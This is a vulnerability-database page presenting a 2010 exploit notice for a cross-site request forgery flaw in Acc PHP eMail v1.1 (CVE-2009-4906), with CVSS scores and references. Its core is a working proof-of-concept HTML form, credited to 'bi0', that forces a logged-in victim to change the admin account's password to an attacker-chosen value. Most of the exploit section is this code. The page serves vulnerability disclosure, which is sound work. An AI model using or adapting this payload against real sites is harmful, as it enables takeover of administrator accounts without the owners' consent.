Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
Acc PHP eMail v1.1 - Cross Site Request Foregery
2010.06.29
Credit:
bi0
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2009-4906
CWE:
CWE-352
CVSS Base Score:
6.8/10
Impact Subscore:
6.4/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
Partial
Availability impact:
Partial
view source print? ______ __ ______ /\ == \ /\ \ /\ __ \ \ \ __< \ \ \ \ \ \/\ \ \ \_____\ \ \_\ \ \_____\ \/_____/ \/_/ \/_____/ 01000010 01101001 01001111 [#]----------------------------------------------------------------[#] # # [+] Acc PHP eMail v1.1 - [ CSRF ] # # // Author Info # [x] Author: bi0 # [x] Contact: bukibv@hotmail.com # [x] Homepage : www.ssteam.ws # [x] Thanks: packetdeath,,Zer0flag,redking and ssteam.ws ... # [#]-------------------------------------------------------------------------------------------[#] # # [x] Exploit : # # [ CSRF ] # # It Changes the password # # http://localhost/mailinglist/index.php # # // Start CSRF # <html> # <form action="http://localhost/mailinglist/demo/index.php" method="POST"> # <input type="hidden" name="action" value="change"> # <input type="hidden" name="id" value="1"> # <input type="hidden" id="text" name="user" value="admin"> # <input type="password" name="password" value="pass"> # <input type="password" name="password1" value="pass"> # <input type="hidden" name="action" value="change1"> # <input type="submit" name="login" value="Modify"> # </form> # </html> # // End of attack # [#]------------------------------------------------------------------------------------------[#] #EOF
References:
http://www.vupen.com/english/advisories/2009/3508
http://www.exploit-db.com/exploits/10412
http://secunia.com/advisories/37666
http://packetstormsecurity.org/0912-exploits/ape-xsrf.txt
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top